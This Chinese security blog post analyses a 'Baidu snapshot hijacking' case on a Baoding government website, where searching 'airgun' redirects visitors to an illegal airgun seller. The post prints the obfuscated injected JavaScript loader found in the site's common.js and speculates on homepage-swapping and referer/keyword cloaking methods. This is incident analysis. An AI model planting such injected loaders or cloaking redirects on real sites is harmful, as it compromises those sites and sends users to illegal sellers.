我喜欢黑夜,喜欢网络安全,孤独寂寞的黑夜里,我只需要,一包烟,一台笔记本...
更多
首  页>>网络攻防>> 渗透测试百度快照劫持技术实现手段猜解
百度快照劫持技术实现手段猜解
6132
0推荐
3评论

今天在群里有人在兜售一种称为《百度快照劫持》的技术,他做的关键字是“汽枪”,关键字排名居然达到了第一名




点开后跳转到一个出售违禁品的气枪网站,网址显示的是www.bd.gov.cn,直接打开域名显示的是保定市人民政府的官方网站,权重之高,恐怕是众多草根站长永远都无法企及的。


而有意思的是,网站首页似乎被部署了某种代码,只有在百度搜索“汽枪”一词的时候,才会跳转到他的网站,隐蔽性非常高,如果没有人投诉,管理员几乎不可能发现。


对于技术控的朽木来说,新鲜的事物总能让朽木瞬间爆点,怎么也要摸清楚它的实现原理。


发现伪装JS文件,疑似JS手段实现


直接查看www.bd.gov.cn的源代码,没有发现任何问题,通过FF的插件可以看到,页面通过SCRIPT脚步方式载入了一个“http://www.wzb360.tk/image.gif”的文件,通过万网的WHOIS居然提示不能查询TK域名,难得的是WHO.IS也依然没有结果,站长工具的WHOIS查询倒是出了结果,可没有任何意义。


本地PING,发现域名指向的是127.0.0.1,难道问题不在这里?


在服务器中js/common.js文件中找到了两句问题代码


var _$=["x3cx73x63x72x69x70x74x20x73x72x63x3dx68x74x74x70x3a//x77x77x77x2ex77x7ax62x33x36x30x2ex74x6b/x69x6dx61x67x65x2ex67x69x66x3ex3c/x73x63x72x69x70x74x3e"];
document.writeln(_$[0]);

document.writeln("

");

第二句就是之前发现的问题代码,但是访问不了。


第一句加密了,解密之后朽木发现和第二句是同样的代码。


怀疑是服务器做了特殊处理,只有在bd.gov.cn载入JS形式时才可以访问。


百度快照蛛丝马迹,黑客偷梁换柱


如图

(点击提示403,再点下访问就可以了)


从快照中看出百度索引到的页面并不是我们访问时候看到的页面,页面结构是纯CSS组成,并且没有调用外部文件,顶部有一个“保定市人民政府 ”的链接指向了http://www.bd.gov.cn/defaolt.aspx,那么毋庸置疑,能实现这种效果的只有两种方法:


第一种,在凌晨时间段把假的主页换上去,对于这样的高权重站,百度在晚上是绝对不会休息的,那么每天的0点到3点换上假的主页,不出3天肯定能索引到这个“主页”。


第二种方法,在主页中做手脚,改动程序判断百度蜘蛛来路IP,送给百度伪造的主页,不过这种方法管理员容易找到痕迹,只是猜测。


方法和原理都知道了,不过最关键的一段跳转代码没有看到,还是有点遗憾,朽木先琢磨琢磨再发表。


补充:


之前朽木的浏览器是IE9,看不了全部缓存,现在可以肯定跳转做到了程序里,应该是default.aspx文件中载入了判断脚本,如果来路是百度,并且关键字是“气枪”那么页面就会跳转到他的网站去。


至于之前发现的伪装JS文件,可能是同一人作为,觉得JS的效果不好,也可能是之前其他的人入侵之后留下的。


已经有 ( 3 ) 位网友对此发表了自己的看法,你也评一评吧! 此文不错,我要推荐-->    推 荐
  • 3楼 shack2 发表于:2012-11-02 12:51:26.0        回复
    我来自乌云
  • 2楼 习惯一个人 发表于:2012-11-01 14:10:58.0        回复
    哪个群的? 小夜的还是BIN群的?
  • 1楼 yezi 发表于:2012-10-09 13:57:44.0        回复
    一般这种手法都是根据refererr 和 user agent 来做的。代码实现很简单。
欢迎参与讨论,请在这里发表您的看法、交流您的观点@禁止各种脚本

  • 点击Top
  • 推荐Top
  • 评论Top
更 多>>
本站采用Java语言开发,Spring框架,欢迎朋友们提意见。重新对页面进行布局,修改了程序,方便开源使用,由于本人美工真的不行 ,很少用背景图片,页面基本都用背景色...
主题:无色无味 | 网站地图|
Copyright (c) 2012-2013 www.shack2.org All Rights Reserved. | 空ICP备111111111号 | 程序设计: shack2 Powered by SJBlog v1.0 联系QQ:1341413415